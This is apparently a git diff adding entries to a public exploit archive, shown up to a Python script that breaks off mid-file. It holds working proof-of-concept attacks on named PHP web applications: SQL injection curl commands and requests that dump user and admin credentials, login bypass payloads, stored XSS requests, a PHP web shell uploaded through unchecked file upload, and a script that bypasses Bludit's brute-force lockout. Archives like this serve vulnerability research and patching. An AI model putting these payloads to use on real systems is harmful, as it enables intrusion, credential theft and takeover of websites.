diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt
index 35326f319..599c53baf 100644
--- a/exploits/php/webapps/48636.txt
+++ b/exploits/php/webapps/48636.txt
@@ -4,6 +4,7 @@
# Vendor Homepage: http://ritecms.com/
# Version: 2.2.1
# Tested on: Linux
+# CVE: CVE-2020-23934
1- Go to following url. >> http://(HOST)/cms/
2- Default username and password is admin:admin. We must know login credentials.
diff --git a/exploits/php/webapps/48928.txt b/exploits/php/webapps/48928.txt
new file mode 100644
index 000000000..cbc0e8d28
--- /dev/null
+++ b/exploits/php/webapps/48928.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload
+# Date: 22-10-2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add
+
+#Exploit
+ Fill details
+ Create php shell code with below script
+ "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
+ Click on Browse
+ Select php file
+ Click Save
+ Access below URL:
+ http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir
+ add system commands after cmd to execute it.
\ No newline at end of file
diff --git a/exploits/php/webapps/48930.txt b/exploits/php/webapps/48930.txt
new file mode 100644
index 000000000..2cf4e4bc8
--- /dev/null
+++ b/exploits/php/webapps/48930.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Stock Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2020-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+fetchSelectedBrand.php
+#
+$brandId = $_POST['brandId'];
+$sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId";
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
+ --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
+ $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php'
+#
+# POC:
+# 2)
+#
+fetchSelectedCategories.php
+#
+$categoriesId = $_POST['categoriesId'];
+$sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId";
+#
+curl -i -s -k -X $'POST' \
+ -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+ -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
+ --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
+ $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php'
+#
+# ++
+
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48931.txt b/exploits/php/webapps/48931.txt
new file mode 100644
index 000000000..cb8e3f691
--- /dev/null
+++ b/exploits/php/webapps/48931.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload
+# Date: 22-10-2020
+# Exploit Author: Jyotsna Adhana and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car
+
+#Exploit
+ Fill details
+ Create php shell code with below script
+ "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
+ Click on Browse
+ Select php file
+ Click Save
+ Access below URL:
+ http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo
+ add system commands after cmd to execute it.
\ No newline at end of file
diff --git a/exploits/php/webapps/48932.txt b/exploits/php/webapps/48932.txt
new file mode 100644
index 000000000..62f60a454
--- /dev/null
+++ b/exploits/php/webapps/48932.txt
@@ -0,0 +1,23 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection
+# Dork: N/A
+# Date: 2020-10-22
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on: Linux
+# CVE: N/A
+
+# POC:
+# 1)
+#
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email
+
+curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact
+#
+#
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/48933.txt b/exploits/php/webapps/48933.txt
new file mode 100644
index 000000000..70d7a6ecf
--- /dev/null
+++ b/exploits/php/webapps/48933.txt
@@ -0,0 +1,35 @@
+#Exploit Title: Point of Sales 1.0 - SQL Injection
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1
+
+Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1'
+
+Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+
+
+Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+
+
+Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+
+
+
+Malicious Request:::
+
+GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+Upgrade-Insecure-Requests: 1
+
+Gives database name *sourcecodester_posdb*
\ No newline at end of file
diff --git a/exploits/php/webapps/48934.txt b/exploits/php/webapps/48934.txt
new file mode 100644
index 000000000..65e66a57e
--- /dev/null
+++ b/exploits/php/webapps/48934.txt
@@ -0,0 +1,35 @@
+#Exploit Title: lot reservation management system 1.0 - Authentication Bypass
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php
+
+Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password.
+
+
+Malicious Request:::
+
+POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 71
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+
+username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B
+
+You will be login as admin of the application.
\ No newline at end of file
diff --git a/exploits/php/webapps/48935.txt b/exploits/php/webapps/48935.txt
new file mode 100644
index 000000000..73c0dc338
--- /dev/null
+++ b/exploits/php/webapps/48935.txt
@@ -0,0 +1,87 @@
+#Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting
+#Date: 2020-10-22
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
+
+Step 2: Use payload in Name and Discription.
+
+
+Malicious Request:::
+POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097
+Content-Length: 613
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions
+Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------65714323539404637092301409097
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------65714323539404637092301409097--
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="gender"
+
+Female
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="contact"
+
+9876543211
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="nid"
+
+12
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="address"
+
+Gujarat
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="dept"
+
+CS
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="degree"
+
+BE
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="salary"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3267707159765331982713791736--
+
+
+Cookie will be reflected on View Employee.
\ No newline at end of file
diff --git a/exploits/php/webapps/48936.txt b/exploits/php/webapps/48936.txt
new file mode 100644
index 000000000..072d2c1b2
--- /dev/null
+++ b/exploits/php/webapps/48936.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/gym/gym/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48937.txt b/exploits/php/webapps/48937.txt
new file mode 100644
index 000000000..d3c91c717
--- /dev/null
+++ b/exploits/php/webapps/48937.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Point of Sales 1.0 - 'username' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: username
+# Injected Request
+
+POST /pos/pos/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 81
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/pos/pos/
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login=
+
+//Comment
+The reponse will be delayed by 5s.
\ No newline at end of file
diff --git a/exploits/php/webapps/48938.txt b/exploits/php/webapps/48938.txt
new file mode 100644
index 000000000..842a98f3e
--- /dev/null
+++ b/exploits/php/webapps/48938.txt
@@ -0,0 +1,24 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48939.txt b/exploits/php/webapps/48939.txt
new file mode 100644
index 000000000..aa3f0cf67
--- /dev/null
+++ b/exploits/php/webapps/48939.txt
@@ -0,0 +1,24 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection
+# Date: 22/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#parameter Vulnerable: id
+# Injected Request
+
+GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
diff --git a/exploits/php/webapps/48940.txt b/exploits/php/webapps/48940.txt
new file mode 100644
index 000000000..d1c5d5e39
--- /dev/null
+++ b/exploits/php/webapps/48940.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Gym Management System 1.0 - Authentication Bypass
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/gym/gym/login.php
+
+Step 2: use payload jyot' or 1=1# in Username and Password field
+
+Malicious Request
+
+POST /gym/gym/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/gym/gym/login.php
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
+
+Step 3: You will be logged in as admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/48941.txt b/exploits/php/webapps/48941.txt
new file mode 100644
index 000000000..f499043bd
--- /dev/null
+++ b/exploits/php/webapps/48941.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages
+
+Step 2: use payload in Package Name and Description field
+
+Malicious Request
+POST /gym/gym/ajax.php?action=save_package HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710
+Content-Length: 587
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/gym/gym/index.php?page=packages
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="package"
+
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------10391575234966392972740129710
+Content-Disposition: form-data; name="amount"
+
+1
+-----------------------------10391575234966392972740129710--
+
+Step 3: Cookie will be reflected each time someone visits the Packages section.
\ No newline at end of file
diff --git a/exploits/php/webapps/48942.py b/exploits/php/webapps/48942.py
new file mode 100755
index 000000000..8ceec4d0a
--- /dev/null
+++ b/exploits/php/webapps/48942.py
@@ -0,0 +1,102 @@
+#!/usr/bin/python3
+
+# Exploit
+## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
+## Author: ColdFusionX (Mayank Deshmukh)
+## Author website: https://coldfusionx.github.io
+## Date: 2020-10-19
+## Vendor Homepage: https://www.bludit.com/
+## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
+## Version: <= 3.9.2
+
+# Vulnerability
+## Discoverer: Rastating
+## Discoverer website: https://rastating.github.io/
+## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
+## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
+## Patch: https://github.com/bludit/bludit/pull/1090
+
+'''
+Example Usage:
+- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
+'''
+
+import requests
+import sys
+import re
+import argparse, textwrap
+from pwn import *
+
+#Expected Arguments
+parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
+epilog=textwrap.dedent('''
+Exploit Usage :
+./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
+./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))
+
+parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)")
+parser.add_argument("-u","--userlist", help="Username Dictionary")
+parser.add_argument("-p","--passlist", help="Password Dictionary")
+args = parser.parse_args()
+
+if len(sys.argv) < 2:
+ print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
+ sys.exit(1)
+
+# Variable
+LoginPage = args.url
+Username_list = args.userlist
+Password_list = args.passlist
+
+log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')
+
+def login(Username,Password):
+ session = requests.session()
+ r = session.get(LoginPage)
+
+# Progress Check
+ process = log.progress('Brute Force')
+
+#Getting CSRF token value
+ CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
+ CSRF = CSRF.group(1)
+
+#Specifying Headers Value
+ headerscontent = {
